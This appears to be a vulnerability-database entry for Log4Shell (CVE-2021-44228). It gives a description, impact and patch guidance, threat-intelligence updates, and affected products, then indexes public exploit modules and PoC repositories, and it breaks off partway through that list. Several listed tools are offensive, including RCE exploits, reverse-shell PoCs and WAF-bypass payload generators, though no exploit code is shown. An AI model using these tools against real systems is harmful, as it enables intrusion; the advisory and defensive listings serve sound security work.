CVE-2021-44228

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 10/12 Upd 21/10

Overview

This vulnerability is a remote code execution flaw caused by improper input validation in the JNDI lookup mechanism of Apache Log4j2's log message substitution feature. The root cause lies in the log4j-core component's failure to restrict attacker-controlled LDAP and other JNDI endpoints, allowing untrusted data to trigger JNDI lookups. This affects versions 2.0-beta9 through 2.15.0, excluding certain security releases, where message lookup substitution is enabled by default.

Vulnerability Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Impact

An unauthenticated attacker can execute arbitrary code on affected systems by injecting malicious JNDI lookup strings into log messages or parameters, leading to full system compromise. No user interaction or credentials are required, enabling remote code execution through network requests. This can result in data breaches, lateral movement within networks, and disruption of critical services relying on vulnerable Log4j2 instances.

Solution

Apply vendor-recommended patches by upgrading Apache Log4j2 to version 2.16.0 or later, where vulnerable JNDI functionality is removed. For affected Debian systems, refer to Debian Security Advisory DSA-5020. Cisco and Microsoft have issued advisories with patch guidance accessible via their security centers. Detailed remediation instructions and version-specific fixes are available at the Apache Log4j2 security page (https://logging.apache.org/log4j/2.x/security.html).

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in Apache Log4j2 arises from its handling of Java Naming and Directory Interface (JNDI) features, which are used for configuration, log messages, and parameters. Specifically, the flaw allows an attacker to manipulate log messages or parameters to execute arbitrary code via remote servers, such as LDAP. This occurs when message lookup substitution is enabled, which is a default behavior in versions prior to 2.15.0. The implications of this vulnerability are severe, as it can lead to remote code execution, allowing attackers to gain control over affected systems and potentially escalate privileges or exfiltrate sensitive data.

Attack vectors exploiting this vulnerability are diverse and can be executed through various means. For instance, an attacker could send a specially crafted log message containing malicious payloads to an application that utilizes Log4j2 for logging. If the application processes this input without proper validation, it can trigger the JNDI lookup, leading to the execution of the attacker's code. This scenario can occur in web applications, microservices, or any software component that logs user input or system events. Furthermore, the ease of exploitation, combined with the widespread use of Log4j2 across numerous applications and services, amplifies the risk, making it a prime target for attackers.

The real-world impact of this vulnerability is profound. Organizations relying on affected versions of Log4j2 face significant business risks, including data breaches, service disruptions, and reputational damage. The potential for widespread exploitation means that attackers could leverage this vulnerability to launch coordinated attacks, affecting not only individual organizations but also entire sectors. For instance, critical infrastructure and cloud services that utilize vulnerable versions could be compromised, leading to cascading failures and significant economic repercussions. The urgency to address this vulnerability was underscored by the rapid development of exploit tools and the high-profile nature of incidents that followed its disclosure.

To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to identify all instances of Log4j2 in use within the organization, including third-party applications that may bundle the library. Regular vulnerability scanning and code reviews can help in identifying affected versions. Once identified, organizations should prioritize upgrading to the latest versions that have disabled the vulnerable behavior by default or removed it entirely. In addition to patching, organizations should implement robust logging and monitoring solutions to detect unusual activity that may indicate exploitation attempts. Network segmentation and strict access controls can further reduce the attack surface, limiting the potential impact of any successful exploitation.

In conclusion, the vulnerability in Apache Log4j2 represents a critical security risk that necessitates immediate attention from organizations leveraging this logging framework. The technical details highlight the ease of exploitation, while the potential real-world impact underscores the urgency for remediation. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture in an increasingly complex threat landscape.




CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new proof-of-concept tools that streamline vulnerability scanning and exploitation. This subtle uptick in activity, while not yet a marked escalation, indicates sustained adversary interest and ongoing refinement of attack methodologies. Notably, ransomware groups associated with this vulnerability continue to leverage these developments, reinforcing the persistent threat posed by Log4Shell exploitation. Although the overall exploit trend remains stable, the availability of more accessible and automated exploitation frameworks lowers the barrier for threat actors, potentially broadening the attacker base. Consequently, the risk level remains critical, underscoring the necessity for continued vigilance as adversaries adapt and expand their operational capabilities.



Update 2 — May 15, 2026

CSURFACE threat intelligence has identified a modest but consistent increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new ransomware actors leveraging this vulnerability. Our telemetry indicates that while overall exploitation activity remains relatively stable, the introduction of additional automated tools and proof-of-concept exploits has lowered the technical barrier for adversaries. This expansion in the exploit toolkit facilitates broader access for less sophisticated threat actors, thereby increasing the potential attack surface. Notably, the ransomware landscape associated with this vulnerability has diversified, with an additional group now confirmed to be actively exploiting Log4Shell, signaling evolving tactics and sustained interest in leveraging this critical flaw. These developments underscore a persistent and adaptive threat environment where the risk of successful compromise remains elevated. Consequently, the threat level for CVE-2021-44228 continues to be assessed as critical, reflecting both the ongoing exploitation momentum and the widening range of adversaries capitalizing on this vulnerability.



Update 3 — May 23, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new proof-of-concept tools that demonstrate expanded attack vectors and enhanced exploitation techniques. This subtle uptick in activity, while not yet rapid or widespread, signals continued adversary interest and innovation in leveraging Log4Shell vulnerabilities. Additionally, the ransomware ecosystem exploiting this flaw has further diversified, with multiple LockBit variants maintaining active campaigns, underscoring the vulnerability’s persistent appeal to financially motivated threat actors. The incremental rise in the EPSS score corroborates this trend, reflecting a marginally heightened likelihood of exploitation in the near term. For defenders, these developments emphasize the necessity of sustained vigilance and monitoring, as the evolving exploit landscape may enable more sophisticated or targeted attacks. Consequently, the overall threat level remains critical, with the risk environment characterized by steady exploitation momentum and an expanding array of adversaries refining their operational tactics.



Update 4 — July 04, 2026

CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2021-44228, reflecting a persistent and expanding adversary interest. Our telemetry indicates that threat actors, including ransomware groups such as LockBit variants and NightSky, continue to leverage this vulnerability as a reliable vector for initial access and payload deployment. While the EPSS score remains near its peak, the slight increase in detection activity underscores ongoing exploitation momentum rather than a new wave of attacks. Concurrently, the emergence of additional proof-of-concept tools and scanning utilities in open repositories suggests adversaries are refining their operational capabilities to automate and scale attacks. This sustained activity, coupled with high-confidence ransomware associations, reinforces the critical threat level. Defenders should interpret these developments as confirmation that CVE-2021-44228 remains a favored target within financially motivated campaigns, necessitating continued vigilance despite the vulnerability’s age.

Affected Products (373)

Vendor Product Version CPE
siemens Siemens 6bk1602-0aa12-0tp0 Firmware All cpe:2.3:o:siemens:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*
siemens Siemens 6bk1602-0aa22-0tp0 Firmware All cpe:2.3:o:siemens:6bk1602-0aa22-0tp0_firmware:*:*:*:*:*:*:*:*
siemens Siemens 6bk1602-0aa32-0tp0 Firmware All cpe:2.3:o:siemens:6bk1602-0aa32-0tp0_firmware:*:*:*:*:*:*:*:*
siemens Siemens 6bk1602-0aa42-0tp0 Firmware All cpe:2.3:o:siemens:6bk1602-0aa42-0tp0_firmware:*:*:*:*:*:*:*:*
siemens Siemens 6bk1602-0aa52-0tp0 Firmware All cpe:2.3:o:siemens:6bk1602-0aa52-0tp0_firmware:*:*:*:*:*:*:*:*
apache Apache Log4j All cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
apache Apache Log4j All cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
apache Apache Log4j All cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
apache Apache Log4j 2.0 cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*
apache Apache Log4j 2.0 cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*
apache Apache Log4j 2.0 cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*
apache Apache Log4j 2.0 cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*
siemens Siemens Sppa-T3000 Ses3000 Firmware All cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*
siemens Siemens Capital All cpe:2.3:a:siemens:capital:*:*:*:*:*:*:*:*
siemens Siemens Capital 2019.1 cpe:2.3:a:siemens:capital:2019.1:-:*:*:*:*:*:*
siemens Siemens Capital 2019.1 cpe:2.3:a:siemens:capital:2019.1:sp1912:*:*:*:*:*:*
siemens Siemens Comos All cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*
siemens Siemens Desigo Cc Advanced Reports 3.0 cpe:2.3:a:siemens:desigo_cc_advanced_reports:3.0:*:*:*:*:*:*:*
siemens Siemens Desigo Cc Advanced Reports 4.0 cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*
siemens Siemens Desigo Cc Advanced Reports 4.1 cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*
+353 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (5)

Module Authors Rank Platform Link
UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/multi/http/ubiquiti_unifi_log4shell
Spencer McIntyre Unknown - View
Log4Shell HTTP Scanner
auxiliary/scanner/http/log4shell_scanner
Spencer McIntyre Unknown - View
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/multi/http/vmware_vcenter_log4shell
Spencer McIntyre Unknown - View
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/linux/http/mobileiron_core_log4shell
Spencer McIntyre Unknown - View
Log4Shell HTTP Header Injection
exploits/multi/http/log4shell_header_injection
Michael Schierl, juan vazquez, sinn3r +1 Unknown - View

ExploitDB (3)

Title Author Type Platform Date Link
AD Manager Plus 7122 - Remote Code Execution (RCE) Chan Nyein Wai remote java - View
Apache Log4j 2 - Remote Code Execution (RCE) kozmer remote java - View
Apache Log4j2 2.14.1 - Information Disclosure leonjza remote java - View

GitHub PoCs (424)

Repository Author Stars Forks Date Link
fullhunt/log4j-scan
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
fullhunt 3425 726 2021-12-13 View
kozmer/log4j-shell-poc
A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
kozmer 1848 543 2021-12-10 View
christophetd/log4shell-vulnerable-app
Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).
christophetd 1140 554 2021-12-10 View
Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Puliczek 950 135 2021-12-10 View
logpresso/CVE-2021-44228-Scanner
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
logpresso 862 169 2021-12-11 View
f0ng/log4j2burpscanner
CVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks
f0ng 841 107 2021-12-11 View
mergebase/log4j-detector
A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) ...
mergebase 640 96 2021-12-12 View
jas502n/Log4j2-CVE-2021-44228
Remote Code Injection In Log4j
jas502n 469 119 2021-12-10 View
corretto/hotpatch-for-apache-log4j2
An agent to hotpatch the log4j RCE from CVE-2021-44228.
corretto 497 72 2021-12-12 View
fox-it/log4j-finder
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228, CVE-2021-45046, CV...
fox-it 439 97 2021-12-14 View
0xInfection/LogMePwn
A fully automated, reliable, super-fast, scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.
0xInfection 395 56 2021-12-14 View
CERTCC/CVE-2021-44228_scanner
Scanners for Jar files that may be vulnerable to CVE-2021-44228
CERTCC 350 85 2021-12-14 View
Diverto/nse-log4shell
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
Diverto 352 47 2021-12-12 View
rubo77/log4j_checker_beta
a fast check, if your server could be vulnerable to CVE-2021-44228
rubo77 247 84 2021-12-13 View
back2root/log4shell-rex
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
back2root 292 30 2021-12-13 View
takito1812/log4j-detect
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multith...
takito1812 195 55 2021-12-10 View
NS-Sp4ce/Vm4J
A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX/vCenter/NSX/Horizon/vRea...
NS-Sp4ce 209 39 2021-12-28 View
HyCraftHD/Log4J-RCE-Proof-Of-Concept
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
HyCraftHD 182 31 2021-12-10 View
alexandre-lavoie/python-log4rce
An All-In-One Pure Python PoC for CVE-2021-44228
alexandre-lavoie 178 29 2021-12-12 View
puzzlepeaches/Log4jUnifi
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.
puzzlepeaches 168 31 2021-12-24 View
mubix/CVE-2021-44228-Log4Shell-Hashes
Hashes for vulnerable LOG4J versions
mubix 155 36 2021-12-10 View
BinaryDefense/log4j-honeypot-flask
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228
BinaryDefense 149 25 2021-12-14 View
NorthwaveSecurity/log4jcheck
A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers...
NorthwaveSecurity 126 24 2021-12-10 View
boundaryx/cloudrasp-log4j2
一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 ...
boundaryx 125 20 2021-12-10 View
Adikso/minecraft-log4j-honeypot
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
Adikso 107 20 2021-12-10 View
0xDexter0us/Log4J-Scanner
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.
0xDexter0us 102 24 2021-12-13 View
puzzlepeaches/Log4jCenter
Exploiting CVE-2021-44228 in vCenter for remote code execution and more.
puzzlepeaches 106 19 2021-12-19 View
thomaspatzke/Log4Pot
A honeypot for the Log4Shell vulnerability (CVE-2021-44228).
thomaspatzke 94 30 2021-12-15 View
tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
Apache Log4j 远程代码执行
tangxiaofeng7 90 30 2021-12-09 View
simonis/Log4jPatch
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process
simonis 108 11 2021-12-10 View
MalwareTech/Log4jTools
Tools for investigating Log4j CVE-2021-44228
MalwareTech 94 12 2021-12-14 View
cyberxml/log4j-poc
A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell
cyberxml 72 33 2021-12-12 View
alexbakker/log4shell-tools
Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-...
alexbakker 86 15 2021-12-13 View
giterlizzi/nmap-log4shell
Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)
giterlizzi 79 20 2021-12-13 View
nccgroup/log4j-jndi-be-gone
A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x "JNDI LDAP" vulnerability.
nccgroup 72 16 2021-12-12 View
bigsizeme/Log4j-check
log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload
bigsizeme 70 16 2021-12-13 View
LiveOverflow/log4shell
Small example repo for looking into log4j CVE-2021-44228
LiveOverflow 72 11 2021-12-15 View
future-client/CVE-2021-44228
Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the ...
future-client 66 3 2021-12-12 View
Jeromeyoung/log4j2burpscanner
CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名
Jeromeyoung 32 37 2021-12-12 View
lucab85/log4j-cve-2021-44228
Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-202...
lucab85 57 10 2021-12-21 View
authomize/log4j-log4shell-affected
Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is mean...
authomize 52 8 2021-12-12 View
CodeShield-Security/Log4JShell-Bytecode-Detector
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)
CodeShield-Security 49 9 2021-12-12 View
CreeperHost/Log4jPatcher
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnera...
CreeperHost 49 6 2021-12-10 View
dtact/divd-2021-00038--log4j-scanner
Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered...
dtact 46 9 2021-12-12 View
redhuntlabs/Log4JHunt
An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.
redhuntlabs 47 8 2021-12-15 View
1lann/log4shelldetect
Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI expl...
1lann 45 8 2021-12-11 View
HynekPetrak/log4shell-finder
Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-...
HynekPetrak 39 13 2021-12-14 View
RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
RedDrip7 44 7 2021-12-12 View
hackinghippo/log4shell_ioc_ips
log4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228)
hackinghippo 37 12 2021-12-13 View
stripe/log4j-remediation-tools
Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)
stripe 40 7 2021-12-14 View
twseptian/spring-boot-log4j-cve-2021-44228-docker-lab
Spring Boot Log4j - CVE-2021-44228 Docker Lab
twseptian 27 20 2021-12-12 View
infiniroot/nginx-mitigate-log4shell
Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script
infiniroot 38 6 2021-12-12 View
Y0-kan/Log4jShell-Scan
log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。
Y0-kan 38 6 2021-12-20 View
fireeye/CVE-2021-44228
OpenIOC rules to facilitate hunting for indicators of compromise
fireeye 37 6 2021-12-13 View
darkarnium/Log4j-CVE-Detect
Detections for CVE-2021-44228 inside of nested binaries
darkarnium 35 7 2021-12-11 View
greymd/CVE-2021-44228
Vulnerability CVE-2021-44228 checker
greymd 35 4 2021-12-10 View
sassoftware/loguccino
Scan and patch tool for CVE-2021-44228 and related log4j concerns.
sassoftware 33 5 2021-12-21 View
toramanemre/log4j-rce-detect-waf-bypass
A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads
toramanemre 23 9 2021-12-11 View
qingtengyun/cve-2021-44228-qingteng-online-patch
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
qingtengyun 25 4 2021-12-12 View
corelight/cve-2021-44228
Log4j Exploit Detection Logic for Zeek
corelight 19 9 2021-12-13 View
r3kind1e/Log4Shell-obfuscated-payloads-generator
Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.
r3kind1e 25 2 2022-05-09 View
mufeedvh/log4jail
A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.
mufeedvh 23 4 2021-12-14 View
pedrohavay/exploit-CVE-2021-44228
This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).
pedrohavay 20 3 2021-12-13 View
blake-fm/vcenter-log4j
Script to apply official workaround for VMware vCenter log4j vulnerability CVE-2021-44228
blake-fm 17 6 2021-12-12 View
faisalfs10x/Log4j2-CVE-2021-44228-revshell
Log4j2 CVE-2021-44228 revshell, ofc it suck!!
faisalfs10x 18 2 2021-12-14 View
Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228
IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228
Malwar3Ninja 16 3 2021-12-12 View
aws-samples/kubernetes-log4j-cve-2021-44228-node-agent
aws-samples 2 17 2021-12-15 View
Glease/Healer
Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2
Glease 19 0 2021-12-09 View
lhotari/log4shell-mitigation-tester
Log4Shell CVE-2021-44228 mitigation tester
lhotari 16 1 2021-12-11 View
ab0x90/CVE-2021-44228_PoC
ab0x90 16 1 2021-12-14 View
roxas-tan/CVE-2021-44228
This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
roxas-tan 10 7 2021-12-16 View
xsultan/log4jshield
Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher
xsultan 13 3 2021-12-14 View
thecyberneh/Log4j-RCE-Exploiter
Scanner for Log4j RCE CVE-2021-44228
thecyberneh 11 5 2021-12-13 View
claranet/ansible-role-log4shell
Find Log4Shell CVE-2021-44228 on your system
claranet 11 5 2021-12-13 View
mitiga/log4shell-cloud-scanner
we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulner...
mitiga 14 1 2021-12-15 View
ossie-git/log4shell_sentinel
A Smart Log4Shell/Log4j/CVE-2021-44228 Scanner
ossie-git 14 1 2021-12-22 View
zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service
zsolt-halo 13 2 2021-12-13 View
snow0715/log4j-Scan-Burpsuite
Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件
snow0715 13 2 2021-12-16 View
Hydragyrum/evil-rmi-server
An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228
Hydragyrum 12 3 2021-12-12 View
rakutentech/jndi-ldap-test-server
A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2...
rakutentech 11 4 2021-12-11 View
kubearmor/log4j-CVE-2021-44228
Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228
kubearmor 9 6 2021-12-15 View
CrackerCat/CVE-2021-44228-Log4j-Payloads
CrackerCat 3 12 2021-12-15 View
Nanitor/log4fix
Detect and fix log4j log4shell vulnerability (CVE-2021-44228)
Nanitor 12 2 2021-12-16 View
marcourbano/CVE-2021-44228
PoC for CVE-2021-44228.
marcourbano 7 7 2021-12-24 View
sunnyvale-it/CVE-2021-44228-PoC
CVE-2021-44228 (Log4Shell) Proof of Concept
sunnyvale-it 8 5 2021-12-12 View
ssl/scan4log4j
Python script that sends CVE-2021-44228 log4j payload requests to url list
ssl 6 7 2021-12-12 View
wortell/log4j
Repo containing all info, scripts, etc. related to CVE-2021-44228
wortell 9 3 2021-12-14 View
Labout/log4shell-rmi-poc
A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI
Labout 8 4 2021-12-19 View
momos1337/Log4j-RCE
Log4j RCE - (CVE-2021-44228)
momos1337 7 5 2021-12-12 View
qingtengyun/cve-2021-44228-qingteng-patch
qingtengyun 9 2 2021-12-12 View
immunityinc/Log4j-JNDIServer
This project will help to test the Log4j CVE-2021-44228 vulnerability.
immunityinc 9 2 2021-12-17 View
lfama/log4j_checker
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.
lfama 8 3 2021-12-13 View
Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs
Public IoCs about log4j CVE-2021-44228
Sh0ckFR 9 1 2021-12-11 View
obscuritylabs/log4shell-poc-lab
A lab demonstration of the log4shell vulnerability: CVE-2021-44228
obscuritylabs 9 1 2021-12-17 View
Tai-e/CVE-2021-44228
Utilize Tai-e to identify the Log4shell (a.k.a. CVE-2021-44228) Vulnerability
Tai-e 9 1 2023-10-06 View
atnetws/fail2ban-log4j
fail2ban filter that catches attacks againts log4j CVE-2021-44228
atnetws 8 2 2021-12-13 View
cybersecurityworks553/log4j-shell-csw
A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.
cybersecurityworks553 8 2 2021-12-24 View
TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability
TaroballzChen 7 3 2021-12-23 View
justakazh/Log4j-CVE-2021-44228
Mass Check Vulnerable Log4j CVE-2021-44228
justakazh 6 4 2021-12-13 View
AlexandreHeroux/Fix-CVE-2021-44228
Apply class remove process from ear/war/jar/zip archive, see https://logging.apache.org/log4j/2.x/
AlexandreHeroux 6 4 2021-12-13 View
KosmX/CVE-2021-44228-example
vulnerability POC
KosmX 7 2 2021-12-10 View
Azeemering/CVE-2021-44228-DFIR-Notes
CVE-2021-44228 DFIR Notes
Azeemering 7 2 2021-12-10 View
DragonSurvivalEU/RCE
CVE-2021-44228 fix
DragonSurvivalEU 6 3 2021-12-10 View
irgoncalves/f5-waf-enforce-sig-CVE-2021-44228
This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device
irgoncalves 6 3 2021-12-11 View
DXC-StrikeForce/Burp-Log4j-HammerTime
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046
DXC-StrikeForce 8 0 2021-12-16 View
OopsieWoopsie/mc-log4j-patcher
CVE-2021-44228 server-side fix for minecraft servers.
OopsieWoopsie 7 1 2021-12-10 View
mschmnet/Log4Shell-demo
Demo to show how Log4Shell / CVE-2021-44228 vulnerability works
mschmnet 7 1 2021-12-19 View
isuruwa/Log4j
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228
isuruwa 6 2 2021-12-15 View
demining/Log4j-Vulnerability
Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (...
demining 6 2 2023-01-31 View
lucab85/ansible-role-log4shell
Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4She...
lucab85 4 4 2021-12-23 View
0xsyr0/Log4Shell
This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046...
0xsyr0 6 1 2021-12-13 View
KeysAU/Get-log4j-Windows.ps1
Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228
KeysAU 7 0 2021-12-15 View
r00thunter/Log4Shell
Generic Scanner for Apache log4j RCE CVE-2021-44228
r00thunter 7 0 2021-12-22 View
jacobtread/L4J-Vuln-Patch
This tool patches the CVE-2021-44228 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN...
jacobtread 5 2 2021-12-10 View
phoswald/sample-ldap-exploit
A short demo of CVE-2021-44228
phoswald 5 2 2021-12-11 View
ankur-katiyar/log4j-docker
Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)
ankur-katiyar 5 2 2021-12-17 View
snapattack/damn-vulnerable-log4j-app
Vulnerable web application to test CVE-2021-44228 / log4shell and forensic artifacts from an example attack
snapattack 5 2 2021-12-20 View
toramanemre/apache-solr-log4j-CVE-2021-44228
A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228
toramanemre 4 3 2021-12-14 View
yesspider-hacker/log4j-payload-generator
log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228
yesspider-hacker 4 3 2021-12-27 View
irgoncalves/f5-waf-quick-patch-cve-2021-44228
This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode
irgoncalves 3 4 2021-12-13 View
winnpixie/log4noshell
A Java Agent that disables Apache Log4J's JNDI Lookup to mitigate CVE-2021-44228 ("Log4Shell").
winnpixie 5 1 2021-12-10 View
OlafHaalstra/log4jcheck
Check list of URLs against Log4j vulnerability CVE-2021-44228
OlafHaalstra 5 1 2021-12-12 View
manuel-alvarez-alvarez/log4j-cve-2021-44228
Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...
manuel-alvarez-alvarez 5 1 2021-12-13 View
KeysAU/Get-log4j-Windows-local
Identifying all log4j components across on local windows servers. CVE-2021-44228
KeysAU 5 1 2021-12-19 View
nkoneko/VictimApp
Vulnerable to CVE-2021-44228. trustURLCodebase is not required.
nkoneko 4 2 2021-12-10 View
corneacristian/Log4J-CVE-2021-44228-RCE
Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)
corneacristian 4 2 2021-12-12 View
perryflynn/find-log4j
Find log4j for CVE-2021-44228 on some places * Log4Shell
perryflynn 2 4 2021-12-13 View
korteke/log4shell-demo
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)
korteke 2 4 2021-12-16 View
sec13b/CVE-2021-44228-POC
exploit CVE-2021-44228
sec13b 1 5 2024-03-23 View
0xRyan/log4j-nullroute
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes
0xRyan 4 1 2021-12-13 View
sud0x00/log4j-CVE-2021-44228
CVE-2021-44228
sud0x00 5 0 2021-12-12 View
mrlnstk/cve-2021-44228-minecraft-poc
Log4J CVE-2021-44228 Minecraft PoC
mrlnstk 5 0 2021-12-12 View
suuhm/log4shell4shell
Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/att...
suuhm 5 0 2021-12-16 View
many-fac3d-g0d/apache-tomcat-log4j
Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat
many-fac3d-g0d 5 0 2021-12-24 View
ycdxsb/Log4Shell-CVE-2021-44228-ENV
Log4Shell Docker Env
ycdxsb 4 1 2021-12-13 View
sinakeshmiri/log4jScan
simple python scanner to check if your network is vulnerable to CVE-2021-44228
sinakeshmiri 4 1 2021-12-13 View
Koupah/MC-Log4j-Patcher
